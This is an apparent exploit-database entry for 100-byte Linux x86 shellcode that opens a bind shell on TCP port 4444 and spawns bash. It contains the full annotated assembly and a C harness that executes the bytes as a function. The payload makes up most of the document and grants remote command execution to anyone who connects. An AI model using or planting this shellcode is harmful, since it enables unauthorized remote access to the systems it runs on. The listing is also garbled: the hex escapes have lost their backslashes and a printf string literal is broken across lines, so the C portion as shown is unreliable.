/*
; Title : Linux/x86 - Bind (4444/TCP) Shell (/bin/bash) Shellcode (100 bytes)
; Date : Jan, 2019
; Author : Joao Batista
; Website : overflw.wordpress.com
; Twitter : @x42x42x42x42
; SLAE-ID : 1420
; Tested on : i686 GNU/Linux
global _start
section .text
; Annotated listing: 32-bit Linux, NASM-style Intel syntax, system calls made with int 0x80.
; Call sequence as written: socket -> bind -> listen -> accept -> dup2 (fds 2,1,0) -> execve.
; All socket operations use syscall 0x66 (socketcall): ebx holds the sub-call number and
; ecx points at the argument array built on the stack.
; NOTE(review): no return value is checked. Several syscall numbers are formed with
; `mov al,..` / `add al,..`, which only gives the intended number when the rest of eax
; is already zero, i.e. when the previous call returned 0 or a small non-negative value.
; Observable behaviour: a TCP listener on 0.0.0.0:4444, then a process whose fds 0, 1
; and 2 all refer to the accepted connection.
_start:
xor eax,eax ; eax = 0
xor ebx,ebx ; ebx = 0
; socket: arguments are pushed last-to-first
push ebx ; protocol = 0
inc ebx ; ebx = 1: socketcall sub-call 1 (socket); the same value is pushed as the type
push ebx ; type = 1 (SOCK_STREAM)
push 0x2 ; domain = 2 (AF_INET)
mov ecx,esp ; ecx -> {2, 1, 0}
mov al,0x66 ; syscall 0x66 = socketcall
int 0x80
; bind
xchg edi,eax ; edi = descriptor returned by socket; kept there for the later calls
xor eax,eax ; eax = 0
inc ebx ; ebx = 2: socketcall sub-call 2 (bind)
push eax ; sin_addr = 0 (all local addresses)
push word 0x5c11 ; sin_port: stored as bytes 11 5c, i.e. 0x115c = 4444 in network byte order
push bx ; sin_family = 2 (AF_INET)
mov ecx, esp ; ecx -> the address structure just built
push 0x10 ; addrlen = 16
push ecx ; pointer to the address structure
push edi ; socket descriptor
mov ecx,esp ; ecx -> {fd, &addr, 16}
mov al,0x66 ; socketcall again
int 0x80
; listen
push eax ; backlog = return value of bind (0 when bind succeeded)
push edi ; socket descriptor
mov ecx,esp ; ecx -> {fd, backlog}
mov al,0x66 ; socketcall; assumes the upper bytes of eax are zero after bind
add ebx,2 ; ebx = 4: socketcall sub-call 4 (listen)
int 0x80
; accept
push eax ; address-length pointer = return value of listen (NULL when listen returned 0)
push eax ; address pointer = same value (NULL)
push edi ; socket descriptor
mov ecx,esp ; ecx -> {fd, NULL, NULL}
add al,0x66 ; eax = 0 + 0x66 only if listen returned 0
inc ebx ; ebx = 5: socketcall sub-call 5 (accept)
int 0x80
; dup2
xchg ebx,eax ; ebx = descriptor returned by accept
xor eax,eax ; eax = 0
xor ecx,ecx ; ecx = 0
mov cl,0x2 ; ecx = 2: first target descriptor, counted down to 0
loop:
mov al,0x3f ; syscall 0x3f = dup2(ebx, ecx)
int 0x80
dec ecx ; next lower descriptor
jns loop ; continue while ecx is still >= 0
; execve("/bin//bash") -- the pushed bytes spell /bin//bash, not /bin/sh
push eax ; string terminator; eax is 0 here when the last dup2 (target fd 0) succeeded
push word 0x6873 ; "sh" (two bytes)
push 0x61622f2f ; "//ba"
push 0x6e69622f ; "/bin"
mov ebx,esp ; ebx -> "/bin//bash"
push eax ; NULL
mov edx,esp ; edx (envp) -> {NULL}
push ebx ; pointer to the path string
mov ecx,esp ; ecx (argv) -> {path, NULL}
mov al,0xb ; syscall 0xb = execve
int 0x80
*/
#include<stdio.h>
#include<string.h>
/* Byte string that main() below casts to a function pointer and calls.
 * As printed here every escape is missing its leading backslash ("x31"
 * instead of "\x31"), presumably lost when the page was extracted, so this
 * literal holds ASCII text rather than the machine code of the listing
 * above. The hex pairs themselves follow that listing's instruction order
 * (31 c0 = xor eax,eax; 31 db = xor ebx,ebx; ... b0 0b cd 80 = execve). */
unsigned char shellcode[] =
"x31xc0x31xdbx53x43x53x6ax02x89xe1xb0x66xcdx80x97x31xc0x43x50x66x68x11x5cx66x53x89xe1x6ax10x51x57x89xe1xb0x66xcdx80x50x57x89xe1xb0x66x83xc3x02xcdx80x50x50x57x89xe1x04x66x43xcdx80x93x31xc0x31xc9xb1x02xb0x3fxcdx80x49x79xf9x50x66x68x73x68x68x2fx2fx62x61x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80";
/* Test harness: prints the length of the shellcode array, then calls the
 * array as if it were a function. Declared without a return type
 * (pre-C99 implicit int). */
main()
{
/* NOTE(review): the line break inside the string literal below was
 * presumably "\n" in the original source; as shown it is not a valid C
 * string. strlen() returns size_t, which does not match the %d conversion,
 * and it stops counting at the first zero byte in the array. */
printf("shellcode length: %d
", strlen(shellcode));
/* Converts the data array to a function pointer and calls it. The call
 * depends on the array's memory being executable; where data pages are
 * mapped non-executable (NX / W^X) it is expected to fault instead. */
int (*ret)() = (int(*)())shellcode;
ret();
}
Linux x86 TCP 4444 Bindshell Shellcode